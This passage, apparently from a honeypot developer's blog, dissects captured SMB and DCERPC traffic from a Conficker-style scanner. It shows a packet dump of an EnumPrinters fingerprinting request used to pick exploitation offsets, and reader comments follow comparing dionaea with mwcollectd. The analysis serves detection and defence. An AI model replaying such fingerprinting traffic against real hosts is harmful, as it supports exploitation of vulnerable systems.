Pad = b'' sizeof( 0) off= 42 goff= 78
Param = [] sizeof( 0) off= 42 goff= 78
Pad1 = b'' sizeof( 0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]###
Version = 5 sizeof( 1) off= 0 goff= 78
VersionMinor = 0 sizeof( 1) off= 1 goff= 79
PacketType = Request sizeof( 1) off= 2 goff= 80
PacketFlags = 0x3 sizeof( 1) off= 3 goff= 81
DataRepresentation = 16 sizeof( 4) off= 4 goff= 82
FragLen = 48 sizeof( 2) off= 8 goff= 86
AuthLen = 0 sizeof( 2) off= 10 goff= 88
CallID = 1 sizeof( 4) off= 12 goff= 90
###[ DCERPC Request sizeof(32) ]###
AllocHint = 24 sizeof( 4) off= 0 goff= 94
ContextID = 0 sizeof( 2) off= 4 goff= 98
OpNum = 0 sizeof( 2) off= 6 goff=100
StubData = b'\x08\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00!>%Z\x00\x00\x00\x00\x00\x00\x00\x00' sizeof( 24) off= 8 goff=102
Afterwards the client ran a Treedisconnect, Logoff and disconnected, but as we were able to identify the attacking host, and had a real interest in the malware running the attack, we got a copy of the malware, and the analysis -which Tillmann promised to post to securelist- is, contrary to looking at smb packets, really exciting.
The session outlined here, was only used to fingerprint the host for exploitation offsets, using EnumPrinters - just as metasploit does, and to my great pleasure … nah, I won't spoil on Tillmann's story.
This attack came to our attention, as it made a *large* amount of total traffic for some deployments, and we were provided with the required information (pcap in this case, therefore the data is tshark -V which is even less compact than dionaeas representation) to have a look at it.
Again the attacker had Flags and Flags2 set to 0
NetBIOS Session Service
Message Type: Session message
Length: 47
SMB (Server Message Block Protocol)
SMB Header
Server Component: SMB
SMB Command: Negotiate Protocol (0x72)
Error Class: Success (0x00)
Reserved: 00
Error Code: No Error
Flags: 0x00
Flags2: 0x0000
Process ID High: 0
Signature: 0000000000000000
Reserved: 0000
Tree ID: 0
Process ID: 604
User ID: 0
Multiplex ID: 0
…
Negotiate Protocol Request (0x72)
Word Count (WCT): 0
Byte Count (BCC): 12
Requested Dialects
Dialect: NT LM 0.12
Buffer Format: Dialect (2)
Name: NT LM 0.12
which indicates this is not the windows smb stack.
After sending a Session Setup AndX request
Session Setup AndX Request (0x73)
Word Count (WCT): 13
AndXCommand: No further commands (0xff)
Reserved: 00
AndXOffset: 0
Max Buffer: 65535
Max Mpx Count: 2
VC Number: 604
Session Key: 0x00000000
ANSI Password Length: 0
Unicode Password Length: 0
Reserved: 00000000
Capabilities: 0x00000001
.... .... .... .... .... .... .... ...1 = Raw Mode: Read Raw and Write Raw are supported
Byte Count (BCC): 11
Account:
Primary Domain:
Native OS: MS
Native LAN Manager: CLIENT
with Native OS MS and Native LAN Manager CLIENT, the attacker would disconnect.
Often a variant of Conficker was downloaded after this request, so we basically assume this is a hardcoded scan -probably created using impacket dumps- used by Conficker.
2
Hello Markus,
I am thinking investigate and build a worm detection system based upon the honeypot mwcollectd v4 or dionaea.
My key question is:
-What are the dionaea advantages and differences compared with mwcollectd v4 (what is the best)?
I am in doubt that the honeypot will use in my system.
Thank you for your attention and would greatly appreciate being totally unbiased and answer the question about dionaea and mwcollectd v4.
Best Regards.
3
I would not roll my own, if I think somebody would do better already, so …
What I like about dionaea, logsql, xmpp, virustotal and others. Install both, let me know what you like best.
Markus
[…] 2010:11:12:identifying_toolkits [carnivore news] […]